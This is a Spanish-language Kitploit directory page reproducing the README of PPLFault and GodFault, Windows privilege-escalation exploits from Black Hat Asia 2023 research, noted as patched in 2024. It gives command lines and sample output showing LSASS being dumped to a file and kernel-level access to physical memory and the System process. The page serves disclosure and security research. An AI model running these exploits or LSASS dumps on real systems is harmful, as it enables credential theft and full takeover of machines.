Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
PPLFault — Exploit de escalada de privilegios en Windows que abusa de una vulnerabilidad TOCTOU en Code Integrity para evadir Protected Process Light, ejecutarse como WinTcb-Light y volcar procesos protegidos (p. ej., LSASS). | Kitploit
Herramientas/GitHubGitHub/gabriellandau/pplfault
Escalada de PrivilegiosExplotaciónPost-ExplotaciónPruebas de PenetraciónRed TeamingArchived
GitHubgabriellandau/pplfault

PPLFault

Exploit de escalada de privilegios en Windows que abusa de una vulnerabilidad TOCTOU en Code Integrity para evadir Protected Process Light, ejecutarse como WinTcb-Light y volcar procesos protegidos (p. ej., LSASS).

Ver Repositorio
56781hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

PPLFault

Por Gabriel Landau en Elastic Security.

De PPLdump Is Dead. Long Live PPLdump! presentado en Black Hat Asia 2023.

PPLdump Is Dead. Long Live PPLdump!

PPLFault

ACTUALIZACIÓN 2024-02: Microsoft parcheó PPLFault el 2024-02-13. Consulte este hilo para la discusión relacionada.

Explota un TOCTOU en Code Integrity de Windows para lograr ejecución arbitraria de código como WinTcb-Light y luego volcar un proceso específico. Para más detalles sobre el exploit, consulte mis diapositivas y/o charla.

Salida de ejemplo

root@kitploit:~
PS C:\Users\user\Desktop> cmd /c ver

Microsoft Windows [Version 10.0.25346.1001]
PS C:\Users\user\Desktop> tasklist | findstr lsass
lsass.exe                      992 Services                   0     76,620 K
PS C:\Users\user\Desktop> (Get-NtProcess -Access QueryLimitedInformation -Pid 992).Protection

Type           Signer
----           ------
ProtectedLight Lsa


PS C:\Users\user\Desktop> dir *.dmp
PS C:\Users\user\Desktop> .\PPLFault.exe -v 992 lsass.dmp
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 528 bytes of shellcode written over DLL entrypoint
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\PPLFaultTemp\PPLFaultPayload.dll
 [+] Placeholder: C:\PPLFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Dump saved to: lsass.dmp
 [+] Dump is 74.9 MB
 [+] Operation took 937 ms
PS C:\Users\user\Desktop> dir *.dmp


    Directory: C:\Users\user\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          5/1/2023  11:18 AM       78581973 lsass.dmp

GodFault

Explota el mismo TOCTOU que PPLFault. Sin embargo, en lugar de volcar un proceso, migra a CSRSS y explota una vulnerabilidad en win32k!NtUserHardErrorControlCall de ANGRYORCHARD para decrementar KTHREAD.PreviousMode de UserMode (1) a KernelMode (0). Demuestra el acceso "God Mode" abriendo \Device\PhysicalMemory, normalmente inaccesible desde UserMode, como SECTION_ALL_ACCESS.

Salida de ejemplo

root@kitploit:~
C:\Users\user\Desktop>GodFault.exe -v
 [?] Server does not appear to be running.  Attempting to install it...
 [+] No cleanup necessary.  Backup does not exist.
 [+] GetShellcode: 2304 bytes of shellcode written over DLL entrypoint
 [+] CSRSS PID is 772
 [+] Benign: C:\Windows\System32\EventAggregation.dll.bak
 [+] Payload: C:\GodFaultTemp\GodFaultPayload.dll
 [+] Placeholder: C:\GodFaultTemp\EventAggregationPH.dll
 [+] Acquired exclusive oplock to file: C:\Windows\System32\devobj.dll
 [+] Testing initial ability to acquire PROCESS_ALL_ACCESS to System: Failure
 [+] Ready.  Spawning WinTcb.
 [+] SpawnPPL: Waiting for child process to finish.
 [+] FetchDataCallback called.
 [+] Hydrating 90112 bytes at offset 0
 [+] Switching to payload
 [+] Emptying system working set
 [+] Working set purged
 [+] Give the memory manager a moment to think
 [+] Hydrating 90112 PAYLOAD bytes at offset 0
 [+] Thread 6248 (KTHREAD FFFFA283B0A62080) has been blessed
 [+] Testing post-exploit ability to acquire PROCESS_ALL_ACCESS to System: Success
 [+] Opened \Device\PhysicalMemory.  Handle is 0x1b4
 [+] Opened System process as PROCESS_ALL_ACCESS.  Handle is 0x1c0
 [+] Press any key to continue...
 [+] No cleanup necessary.  Backup does not exist.

Python

PoC que logra ejecución arbitraria de código como WinTcb-Light sin la API de CloudFilter. Consulte python/README.md.

Plataformas probadas

Windows 11 22H2 22621.1702 (mayo de 2023)Windows 11 Insider Canary 25346.1001 (abril de 2023)
PPLFault✔️✔️
GodFault✔️❌ Mitigación de PreviousMode de Insider bugchecks

Licencia

PPLFault está cubierto por la licencia ELv2. Utiliza phnt de SystemInformer bajo la licencia MIT.

Créditos

Inspirado por PPLdump de Clément Labro, que Microsoft parcheó en julio de 2022.

ANGRYORCHARD fue creado por Austin Hudson, quien lo publicó cuando Microsoft parcheó PPLdump.

Descargar herramienta